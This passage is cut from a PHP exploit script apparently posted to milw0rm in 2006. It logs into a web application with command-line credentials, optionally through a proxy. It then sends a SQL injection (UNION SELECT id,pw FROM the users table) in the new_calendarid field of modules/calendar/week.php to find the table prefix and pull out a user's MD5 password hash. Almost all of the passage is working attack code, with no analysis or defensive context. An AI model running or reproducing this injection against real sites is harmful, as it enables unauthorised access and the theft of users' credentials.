x128.net oo website : www.x128.net\n"; } function exploit_execute() { $connection = curl_init(); if ($_SERVER['argv'][5]) { curl_setopt($connection, CURLOPT_TIMEOUT, 8); curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]); } curl_setopt ($connection, CURLOPT_USERAGENT, 'x128'); curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($connection, CURLOPT_HEADER, 0); curl_setopt ($connection, CURLOPT_POST, 1); curl_setopt ($connection, CURLOPT_COOKIE, 1); curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt'); curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt'); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/index.php"); curl_setopt ($connection, CURLOPT_POSTFIELDS, "login=" . $_SERVER['argv'][2] . "&password=" . $_SERVER['argv'][3] . "&checkip=0"); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); curl_setopt ($connection, CURLOPT_POST, 1); curl_setopt ($connection, CURLOPT_POSTFIELDS, "new_calendarid=x128"); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/modules/calendar/week.php?"); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); preg_match("/([0-9a-zA-Z_]*)users/", $source, $prefix); curl_setopt ($connection, CURLOPT_POST, 1); curl_setopt ($connection, CURLOPT_POSTFIELDS, "new_calendarid=" .urlencode("0 UNION SELECT id,pw FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4])); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/modules/calendar/week.php"); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); preg_match("/>([0-9a-f]{32}) # milw0rm.com [2006-09-19]